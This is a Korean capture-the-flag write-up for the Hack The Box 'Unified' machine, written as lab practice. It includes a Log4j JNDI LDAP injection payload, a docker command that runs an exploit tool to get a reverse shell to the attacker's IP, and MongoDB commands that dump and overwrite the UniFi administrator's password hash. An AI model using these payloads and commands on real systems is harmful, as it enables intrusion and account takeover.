[Hack The Box] Unified 풀이

💡 Hack-The-Box Unified 풀이 입니다.

문제

Attacker(Me) IP : 10.10.16.49
Target IP : 10.129.199.68

Enumeration

대상 호스트의 ip는 위와 같습니다. 먼저 스캐닝을 통해서 오픈된 서비스를 확인합니다.

nmap -n -sV -p- --min-rate 3000 10.129.199.68

Nmap scan report for 10.129.199.68
Host is up (0.22s latency).
Not shown: 65498 closed tcp ports (conn-refused), 31 filtered tcp ports (no-response)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp open  ibm-db2-admin?
8080/tcp open  http-proxy
8443/tcp open  ssl/nagios-nsca Nagios NSCA
8843/tcp open  ssl/unknown
8880/tcp open  cddbp-alt?

nmap 스캔 결과 총 6개의 포트가 open된 것으로 나오며 이 중 8443 포트로 접속하면 다음과 같이 웹사이트가 나옵니다.

unifi 6.4.54 를 키워드로 구글링을 해보면 log4j가 보입니다.

관련된 블로그를 읽어보니 해당 버전에서 log4j 취약점이 존재하는 것으로 보입니다.

취약점이 발생하는 매개변수는 remembee변수로 해당 변수에 취약점이 발생하는지 확인하기 위해서 payload를 다음과 같이 넣어줍니다. 그 전에 1389포트를 열어놓아야 ldap 요청이 오는지 확인이 가능합니다.

remember : ${jndi:ldap://(공격자IP):1389/a}

1389포트로 요청이 온 것을 통해서 log4j 취약점이 존재함을 확인할 수 있습니다.

log4junifi에서 익스플로잇 코드를 다운 받아서 다음과 같이 log4j 익스플로잇을 수행할 수 있습니다.

먼저 4444번 포트를 열어놓고, 다음과 같이 명령어를 입력해 주면 4444번 포트로 리버스 쉘이 생성됩니다.

명령어

docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi -u https://10.129.199.68:8443 -i 10.10.16.49 -p 4444

Privilege Escalation

target machine으로 연결 되었으니, 이제 권한 상승을 위해서 다시 정보를 획득합니다.

ps 명령어를 통해 실행중인 프로세스를 보니, mongoDB가 27117 포트로 실행중인 것을 볼 수 있습니다.

27117포트로 접속을 시도하면 다음과 같이 접근이 가능합니다.

현재 default로 접속한 db는 test이며, 다른 database 정보를 출력하면 다음과 같습니다.

ace 데이터베이스가 unifi에서 사용하는 기본 database로 use ace명령어로 해당 db로 접속한 다음, show collections로 컬렉션 정보를 출력하면 여러가지 컬렉션이 나옵니다. 이중 admin컬렉션의 정보를 출력해 봅니다.

db.admin.find()           # 그냥 출력
db.admin.find().forEach(printjson) # json 형태로 출력

처음 데이터를 보면, administrator계정에 대한 정보가 들어있는 것을 알 수 있습니다. shadow정보가 $6인것으로 보아 SHA-512로 해시되어 있는 것을 알 수 있습니다.

제가 먼저 시도해본 방법은 해당 해시값을 따로 저장해서 john the ripper로 rockyou.txt 사전파일을 통해 알아내는 것을 시도해 보았지만, 사전파일에 존재하는 비밀번호는 아닌 것 같았습니다.(5분정도 돌렸는데 못찾음)

그 다음 시도는 administrator 계정의 비밀번호를 바꾸는 것입니다.

먼저 위의 shadow정보와 동일하게 SHA-512로 암호화된 비밀번호를 생성합니다.

$ mkpasswd -m SHA-512
password : (hackthebox입력)

이제 이 해시값을 업데이트 문법에 맞도록 넣어줍니다.

db.admin.update({"_id" : ObjectId("61ce278f46e0fb0012d47ee4")},{$set : {"x_shadow" : "$6$fv.mBFbjj71bS3JU$vgwWx8jMgP.n8XnqDJ1hzQsbnoB8y5FdoD9OExH4zxU7ls3oJIlrLZiTEMiuWiDueZD/KBjZQzi00mjBpIqTN."}})

제대로 업데이트가 되었는지 확인해 봅니다.

성공적으로 업데이트 되었습니다. 이제 administrator계정의 비밀번호가 hackthebox로 변경되었습니다.

홈페이지에 다시 들어가서 id/pw를 입력하여 로그인을 시도합니다.

로그인에 성공하면 다음과 같이 대시보드가 나옵니다.

몇가지 기능을 열어보면 다음과 같이 ssh 정보를 알아낼 수 있습니다.

ssh로 root의 비밀번호를 알아냈으므로 이를 이용해서 root로 접속을 합니다.

플래그를 알아내면서 해당 box를 클리어 할 수 있습니다.